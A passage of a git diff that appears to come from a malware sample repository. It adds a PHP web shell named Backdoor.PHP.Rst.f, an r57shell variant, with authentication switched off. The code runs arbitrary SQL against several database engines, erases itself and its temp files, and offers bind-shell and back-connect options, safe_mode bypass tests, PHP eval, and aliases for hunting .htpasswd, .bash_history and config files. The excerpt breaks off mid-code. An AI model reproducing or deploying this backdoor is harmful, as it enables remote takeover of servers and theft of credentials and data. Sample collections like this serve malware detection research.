sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></table>"; +} +echo $table_up3."<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by Andika - Modification By Andika | <a href=http://www.betalmostdone.tk>http://www.betalmostdone.tk</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f; +?> + diff --git a/PHP/Backdoor.PHP.Rst.f b/PHP/Backdoor.PHP.Rst.f new file mode 100644 index 00000000..19c6f03a --- /dev/null +++ b/PHP/Backdoor.PHP.Rst.f @@ -0,0 +1,1874 @@ +<?php +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "69"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +/* ~~~ ÐÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ ~~~ */ + +// $auth = 1; - ÐÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ Ð²ÐºÐ»ÑŽÑ‡ÐµÐ½Ð° +// $auth = 0; - ÐÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ Ð²Ñ‹ÐºÐ»ÑŽÑ‡ÐµÐ½Ð° +$auth = 0; + +// Логин и пароль Ð´Ð»Ñ Ð´Ð¾Ñтупа к Ñкрипту +// ÐЕ ЗÐБУДЬТЕ СМЕÐИТЬ ПЕРЕД Ð ÐЗМЕЩЕÐИЕМ ÐРСЕРВЕРЕ!!! +$name='edu'; // логин Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ +$pass='edu'; // пароль Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) + { + header('WWW-Authenticate: Basic realm="Edu_loco"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://www.sameklink.tk>Edu_Loco OwNz</a> : Access Denied</b>"); + } +} +$head = '<!-- ЗдравÑтвуй ВаÑÑ --> +<html> +<head> +<title>Edu_loco OwNz</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #eeeeee 1px outset; +BORDER-LEFT: #eeeeee 1px outset; +BORDER-BOTTOM: #eeeeee 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE>'; +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mysql_query($query,$db); + $error = @mysql_error($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@mysql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mysql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @mysql_free_result($res); + } + } + @mysql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mssql_query($query,$db); + if (@mssql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mssql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ + @mssql_free_result($res); + } + } + @mssql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @pg_query($db,$query); + $error = @pg_errormessage($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@pg_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @pg_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @pg_free_result($res); + } + } + @pg_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; + break; + case 'Oracle': + $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); + if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } + else + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5) { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $stat = @ociparse($db, $query); + @ociexecute($stat); + if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } + else + { + $rowcount = @ocirowcount($stat); + if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";} + else { + echo "<table width=100%><tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; } + echo "</tr>"; + while(ocifetch($stat)) + { + echo "<tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; } + echo "</tr>"; + } + echo "</table><br>"; + } + @ocifreestatement($stat); + } + } + } + @ocilogoff($db); + } + break; + } + echo "<form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +/* +Выбор Ñзыка +$language='ru' - руÑÑкий +$language='eng' - английÑкий +*/ +$language='eng'; +$lang=array( +'ru_text1' =>'Ð’Ñ‹Ð¿Ð¾Ð»Ð½ÐµÐ½Ð½Ð°Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´Ð°', +'ru_text2' =>'Выполнение команд на Ñервере', +'ru_text3' =>'Выполнить команду', +'ru_text4' =>'Ð Ð°Ð±Ð¾Ñ‡Ð°Ñ Ð´Ð¸Ñ€ÐµÐºÑ‚Ð¾Ñ€Ð¸Ñ', +'ru_text5' =>'Загрузка файлов на Ñервер', +'ru_text6' =>'Локальный файл', +'ru_text7' =>'ÐлиаÑÑ‹', +'ru_text8' =>'Выберите алиаÑ', +'ru_butt1' =>'Выполнить', +'ru_butt2' =>'Загрузить', +'ru_text9' =>'Открытие порта и привÑзка его к /bin/bash', +'ru_text10'=>'Открыть порт', +'ru_text11'=>'Пароль Ð´Ð»Ñ Ð´Ð¾Ñтупа', +'ru_butt3' =>'Открыть', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-адреÑ', +'ru_text14'=>'Порт', +'ru_butt4' =>'Выполнить', +'ru_text15'=>'Загрузка файлов Ñ ÑƒÐ´Ð°Ð»ÐµÐ½Ð½Ð¾Ð³Ð¾ Ñервера', +'ru_text16'=>'ИÑпользовать', +'ru_text17'=>'Удаленный файл', +'ru_text18'=>'Локальный файл', +'ru_text19'=>'Exploits', +'ru_text20'=>'ИÑпользовать', +'ru_text21'=>'Ðовое имÑ', +'ru_text22'=>'datapipe', +'ru_text23'=>'Локальный порт', +'ru_text24'=>'Удаленный хоÑÑ‚', +'ru_text25'=>'Удаленный порт', +'ru_text26'=>'ИÑпользовать', +'ru_butt5' =>'ЗапуÑтить', +'ru_text28'=>'Работа в safe_mode', +'ru_text29'=>'ДоÑтуп запрещен', +'ru_butt6' =>'Сменить', +'ru_text30'=>'ПроÑмотр файла', +'ru_butt7' =>'ВывеÑти', +'ru_text31'=>'Файл не найден', +'ru_text32'=>'Выполнение PHP кода', +'ru_text33'=>'Проверка возможноÑти обхода ограничений open_basedir через функции cURL', +'ru_butt8' =>'Проверить', +'ru_text34'=>'Проверка возможноÑти обхода ограничений safe_mode через функцию include', +'ru_text35'=>'Проверка возможноÑти обхода ограничений safe_mode через загрузку файла в mysql', +'ru_text36'=>'База', +'ru_text37'=>'Логин', +'ru_text38'=>'Пароль', +'ru_text39'=>'Таблица', +'ru_text40'=>'Дамп таблицы базы данных', +'ru_butt9' =>'Дамп', +'ru_text41'=>'Сохранить в файле', +'ru_text42'=>'Редактирование файла', +'ru_text43'=>'Редактировать файл', +'ru_butt10'=>'Сохранить', +'ru_butt11'=>'Редактировать', +'ru_text44'=>'Редактирование файла невозможно! ДоÑтуп только Ð´Ð»Ñ Ñ‡Ñ‚ÐµÐ½Ð¸Ñ!', +'ru_text45'=>'Файл Ñохранен', +'ru_text46'=>'ПроÑмотр phpinfo()', +'ru_text47'=>'ПроÑмотр наÑтроек php.ini', +'ru_text48'=>'Удаление временных файлов', +'ru_text49'=>'Удаление Ñкрипта Ñ Ñервера', +'ru_text50'=>'Ð˜Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ð¾ процеÑÑоре', +'ru_text51'=>'Ð˜Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ð¾ памÑти', +'ru_text52'=>'ТекÑÑ‚ Ð´Ð»Ñ Ð¿Ð¾Ð¸Ñка', +'ru_text53'=>'ИÑкать в папке', +'ru_text54'=>'ПоиÑк текÑта в файлах', +'ru_butt12'=>'Ðайти', +'ru_text55'=>'Только в файлах', +'ru_text56'=>'Ðичего не найдено', +'ru_text57'=>'Создать/Удалить Файл/Директорию', +'ru_text58'=>'ИмÑ', +'ru_text59'=>'Файл', +'ru_text60'=>'Директорию', +'ru_butt13'=>'Создать/Удалить', +'ru_text61'=>'Файл Ñоздан', +'ru_text62'=>'Ð”Ð¸Ñ€ÐµÐºÑ‚Ð¾Ñ€Ð¸Ñ Ñоздана', +'ru_text63'=>'Файл удален', +'ru_text64'=>'Ð”Ð¸Ñ€ÐµÐºÑ‚Ð¾Ñ€Ð¸Ñ ÑƒÐ´Ð°Ð»ÐµÐ½Ð°', +'ru_text65'=>'Создать', +'ru_text66'=>'Удалить', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'Команда', +'ru_text69'=>'Параметр1', +'ru_text70'=>'Параметр2', +'ru_text71'=>"Второй параметр команды:\r\n- Ð´Ð»Ñ CHOWN - Ð¸Ð¼Ñ Ð½Ð¾Ð²Ð¾Ð³Ð¾ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð¸Ð»Ð¸ его UID (чиÑлом) \r\n- Ð´Ð»Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´Ñ‹ CHGRP - Ð¸Ð¼Ñ Ð³Ñ€ÑƒÐ¿Ð¿Ñ‹ или GID (чиÑлом) \r\n- Ð´Ð»Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´Ñ‹ CHMOD - целое чиÑло в воÑьмеричном предÑтавлении (например 0777)", +'ru_text72'=>'ТекÑÑ‚ Ð´Ð»Ñ Ð¿Ð¾Ð¸Ñка', +'ru_text73'=>'ИÑкать в папке', +'ru_text74'=>'ИÑкать в файлах', +'ru_text75'=>'* можно иÑпользовать регулÑрное выражение', +'ru_text76'=>'ПоиÑк текÑта в файлах Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ утилиты find', +'ru_text77'=>'ПроÑмотр Ñтруктуры базы данных', +'ru_text78'=>'Показывать таблицы', +'ru_text79'=>'Показывать Ñтолбцы', +'ru_text80'=>'Тип', +'ru_text81'=>'Сеть', +'ru_text82'=>'Базы данных', +'ru_text83'=>'Выполнение SQL запроÑа', +'ru_text84'=>'SQL запроÑ', +'ru_text85'=>'Проверка возможноÑти обхода ограничений safe_mode через выполнение команд в MSSQL Ñервере', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Sikat..!!', +'eng_text2' =>'Sikat.. di server', +'eng_text3' =>'Jalankan perintah', +'eng_text4' =>'Direktori Skrg', +'eng_text5' =>'Upload files ke server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Sikat', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password untuk', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Table', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text77'=>'Show database structure', +'eng_text78'=>'show tables', +'eng_text79'=>'show columns', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +); +/* +ÐлиаÑÑ‹ команд +ПозволÑÑŽÑ‚ избежать многократного набора одних и тех-же команд. ( Сделано Ð±Ð»Ð°Ð³Ð¾Ð´Ð°Ñ€Ñ Ð¼Ð¾ÐµÐ¹ природной лени ) +Ð’Ñ‹ можете Ñами добавлÑÑ‚ÑŒ или изменÑÑ‚ÑŒ команды. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>и</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + 